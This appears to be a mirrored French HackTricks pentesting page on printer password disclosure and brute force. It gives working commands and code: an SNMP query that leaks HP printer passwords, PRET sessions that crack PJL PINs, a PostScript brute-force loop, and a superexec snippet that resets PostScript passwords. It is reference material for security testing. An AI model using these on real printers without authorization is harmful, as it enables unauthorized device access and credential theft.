mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-02 08:18:54 +00:00
106 lines
7.3 KiB
Markdown
106 lines
7.3 KiB
Markdown
# Divulgation de mots de passe / Brute-Force
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
|
|
|
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et au [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
Les imprimantes sont couramment déployées avec un **mot de passe par défaut ou sans mot de passe initial du tout**. Dans les deux cas, les utilisateurs finaux ou les administrateurs doivent définir activement un mot de passe pour sécuriser l'appareil.
|
|
|
|
## Divulgation de mot de passe
|
|
|
|
### SNMP
|
|
|
|
Les anciennes imprimantes HP avaient un OID vulnérable qui renvoyait le mot de passe. D'autres fournisseurs peuvent avoir des problèmes similaires basés sur SNMP.
|
|
```
|
|
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
|
|
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
|
|
```
|
|
### Pass-Back
|
|
|
|
Si l'imprimante **autorise les personnes en utilisant un LDAP externe**. Si vous avez accès pour **modifier ces paramètres** (peut-être en utilisant une interface de console web), vous pouvez faire en sorte que l'imprimante se connecte à votre serveur LDAP et autorise n'importe quel utilisateur.\
|
|
Notez que vous pourriez également abuser de ces paramètres pour **voler les identifiants que l'imprimante utilise** pour se connecter au serveur LDAP. [Lisez ici pour en savoir plus](../../windows-hardening/active-directory-methodology/ad-information-in-printers.md).
|
|
|
|
## Brute-Force
|
|
|
|
### PJL
|
|
|
|
Les mots de passe PJL sont vulnérables aux attaques par force brute en raison de leur taille de clé limitée à 16 bits. De nos jours, en moins de 30 minutes, vous pouvez deviner le bon mot de passe.
|
|
|
|
Vous pouvez utiliser les commandes `lock` et `unlock` de [PRET](https://github.com/RUB-NDS/PRET) pour tester la force brute :
|
|
```
|
|
./pret.py -q printer pjl
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> lock 999
|
|
PIN protection: ENABLED
|
|
Panel lock: ON
|
|
Disk lock: ON
|
|
printer:/> unlock
|
|
No PIN given, cracking.
|
|
PIN protection: DISABLED
|
|
Panel lock: OFF
|
|
Disk lock: OFF
|
|
```
|
|
### PostScript
|
|
|
|
PostScript offre deux types de mots de passe: le `SystemParamsPassword` est utilisé pour modifier les paramètres d'impression tels que la taille du papier, tandis que le `StartJobPassword` est requis pour sortir de la boucle du serveur et donc modifier définitivement l'environnement PostScript.
|
|
|
|
Des attaques de force brute contre les mots de passe PostScript peuvent être effectuées extrêmement rapidement car l'**interpréteur PostScript peut être programmé pour se craquer littéralement lui-même**:
|
|
```
|
|
/min 0 def /max 1000000 def
|
|
statusdict begin {
|
|
min 1 max
|
|
{dup checkpassword {== flush stop} {pop} ifelse} for
|
|
} stopped pop
|
|
```
|
|
Une autre approche consiste à **contourner les mots de passe PostScript** en les réinitialisant avec l'opérateur propriétaire d'Adobe `superexec`. Cet opérateur réside dans le dictionnaire internaldict, qui est « protégé » par un mot de passe statique et magique (`1183615869`). L'enrobage du code PostScript dans superexec permet à un attaquant d'ignorer divers mécanismes de protection du langage, qui normalement généreraient une erreur invalidaccess. Cela peut être utilisé pour définir des mots de passe PostScript sans soumettre initialement le mot de passe actuel, comme indiqué ci-dessous:
|
|
```
|
|
{ << /SystemParamsPassword (0)
|
|
/StartJobPassword (0) >> setsystemparams
|
|
} 1183615869 internaldict /superexec get exec
|
|
```
|
|
Les commandes de verrouillage et de déverrouillage de [PRET](https://github.com/RUB-NDS/PRET) peuvent être utilisées pour tester des attaques de **brute-force** contre des mots de passe PostScript numériques (entiers) ou pour les **contourner** avec la **magie superexec** :
|
|
```
|
|
./pret.py -q printer ps
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> lock 999
|
|
printer:/> unlock
|
|
No password given, cracking.
|
|
Device unlocked with password: 999
|
|
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
|
|
printer:/> unlock bypass
|
|
Resetting password to zero with super-secret PostScript magic
|
|
Device unlocked with password: 0
|
|
```
|
|
**Plus d'informations sur la divulgation de mots de passe et la force brute sur** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|